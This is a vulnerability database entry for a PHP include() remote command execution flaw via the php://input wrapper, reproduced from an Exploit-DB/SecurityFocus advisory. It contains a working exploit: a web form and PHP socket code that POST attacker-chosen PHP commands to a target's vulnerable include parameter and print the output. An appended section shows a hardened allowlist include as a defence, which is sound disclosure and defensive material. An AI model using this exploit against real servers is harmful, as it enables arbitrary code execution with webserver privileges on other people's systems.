PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution

Vulnerability ID 1054479 Vulnerability type
Published 2004-05-27 Updated 2004-05-27
CVE ID N/A
CNNVD-ID N/A
Platform PHP CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/24149
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/10427/info

PHP is reportedly affected by an arbitrary command-execution weakness through the PHP 'include()' function. This issue is due to a design error that allows the execution of attacker-supplied POST PHP commands when URI data is used as an argument to an 'include()' function.

This issue affects the PHP module itself; however, the problem presents itself only when an application uses a user-supplied URI parameter as an argument to the 'include()' function.

This issue is reported to affect all versions of PHP since 3.0.13. Furthermore, this issue is not resolved by setting the 'php.ini' variable 'allow_url_fopen' to off.

Successful exploitation of this issue will allow an attacker to execute arbitrary PHP code on the affected computer; this will allow the execution of commands to the underlying operating system with the privileges of the affected webserver process. 

<form action="" methode="post" >
target server : <input type="text" name="server" ><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") : <input type="text" name="file" ><br><br>
exec (enclose php commands between <? .. ?> tags): <input type="text" name="cmd" ><br><br>
<INPUT type="submit" value="send">
</form>

<?
if($cmd){
$message  = "POST /".$file."php://input HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen( $cmd )."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
}
fclose($fd);
}
?>
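
The advisory above notes that the weakness only appears when an application passes a user-supplied URI parameter to 'include()', and that 'allow_url_fopen' does not help. The following is an added example, not part of the original advisory or exploit: a hardened include that maps the request value through an allowlist. The `pages` directory, the page names and the `resolve_page()` helper are hypothetical.

```php
<?php
// Added example: hardened replacement for include($_GET['includeParam']).
// PAGE_DIR, the PAGES entries and resolve_page() are hypothetical names.

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => file under PAGE_DIR.
// Nothing outside this map is ever handed to include.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(string $requested): ?string
{
    // Exact-match lookup: wrapper names such as "php://input", remote URLs
    // and "../" sequences are not keys of the map, so they are rejected here.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside PAGE_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Vulnerable pattern described in the advisory, shown only for contrast:
//   include($_GET['includeParam']);  // request data chooses the include target

$requested = isset($_GET['includeParam']) && is_string($_GET['includeParam'])
    ? $_GET['includeParam']
    : 'home';
$target = resolve_page($requested);

if ($target === null) {
    http_response_code(404);
    // Log the rejected value (encoded and truncated) so probing shows up in review.
    error_log('rejected include target: ' . rawurlencode(substr($requested, 0, 200)));
    exit('Not found');
}
include $target;
```

Because the request value is only ever used as a lookup key, the string that reaches `include` is always one of the fixed file names in the map.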
